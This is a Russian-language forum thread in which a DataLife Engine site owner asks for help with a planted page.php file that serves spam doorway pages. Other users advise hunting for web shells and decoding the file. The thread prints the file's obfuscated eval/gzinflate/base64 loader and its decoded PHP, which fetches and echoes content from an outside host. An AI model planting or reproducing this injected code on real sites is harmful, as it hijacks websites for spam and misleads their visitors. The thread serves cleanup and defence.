Файл page.php в корне DLE создает левые страницы

ТС вам залил дОров, ищите шеллы, смена паролей вам не поможет.

Чочо? Я твой труба шатал, не?

ищем, никак не можем найти! ) может кто подскажет где в ДЛЕ еще они могут прятаться? (uploads и templates проверили вроде норм) и большую часть на что ругался айболит тоже проверили, все чисто...

Попробуйти найти файлы с именами типа security.php, img.php, htaccess.php и тому подобные названия файлов, которые вы бы не заметили или побоялись удалить

Смотрели, ничего подобного нету. Единстенный подозрительный файл это page.php, через который и происходит это все... может кто поможет его расшифровать?

Вот его первые строки:

<?php

preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'lZm5juTKFUR9Ae8fBoMxJOeBZG4kBvqTclibJVvozxdv5AkmpyQM9IxCV3HJvGtE3OwfX4/34/nt25///Pb99tWm47Pcvmo5Pu32Vd7jd9yrj+MzH5/Ury3r8TnuL8dzy.....

смотрите по дате модификации файлов. (хотя ее тоже часто правят). И еще- правильно настроенные права на файлы и папки- спасают от правки файлов (есть такое понятие как шел с порезанными правами - они никому не интересны).

а отправьте и мне файл page.php глянуть вдруг че найду

hungry_studentСРАБАКАukr.net

Полно же сервисов :)

http://www.unphp.net/

http://ddecode.com/phpdecoder/

и т.п.

расшифровка этого файла вам ничего не даст, там грубо говоря инструкция откуда тянуть доры.. а вам нужно найти шелл снести его и залатать дырки в системе

Спасибо, помогли с расшифровкой!!))

А вот что в этом самом файле page.php, в индес.пхп смотрел, вроде все чисто. Искал подобные операторы в разных файлах, ниче нигде нету) Может кто еще чтото подскажет? :)

<?php ?><?php

error_reporting(0);

$get = 'post'; // http://site.ru/?dor= dor

$charset = 'windows-1251';

if (isset($_GET[$get])) {

if (empty($_GET[$get])) $name = 'index.php';

else $name = $_GET[$get];

//================settings=======================//

$defaultType = "text/html; charset=$charset";

$fileType = array("css" => "text/css; charset=$charset", "png" => "image/png", "jpg" => "image/jpeg", "jpeg" => "image/jpeg", "gif" => "image/gif", "js" => "text/javascript", "xml" => "text/xml",);

$dor_host = 'http://rokpok.ru/files/' . str_replace('www.', '', $_SERVER[SERVER_NAME]);

//===============================================//

$f1 = strrpos($name, ".");
$f2 = substr($name, $f1 + 1, 999);
$fileRas = strtolower($f2);
$filename = $dor_host . '/' . $name;
$file = file($filename);
$type = array_key_exists($fileRas, $fileType) ? $fileType[$fileRas] : $defaultType;
header("Content-Type: $type");
if ($file) {
$html = implode('', $file);
echo $html;
exit;
} elseif (extension_loaded('curl')) {
$ch = curl_init();
$url_string = $dor_host . '/' . $name;
curl_setopt($ch, CURLOPT_URL, $url_string);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$html = curl_exec($ch);
curl_close($ch);
if ($html) {
echo $html;
} else {
header("Status: 404 Not Found");
echo 'PAGE NOT FOUND';
}
exit;
} else {
header("Status: 404 Not Found");
echo 'PAGE NOT FOUND';
}
exit;
}
?>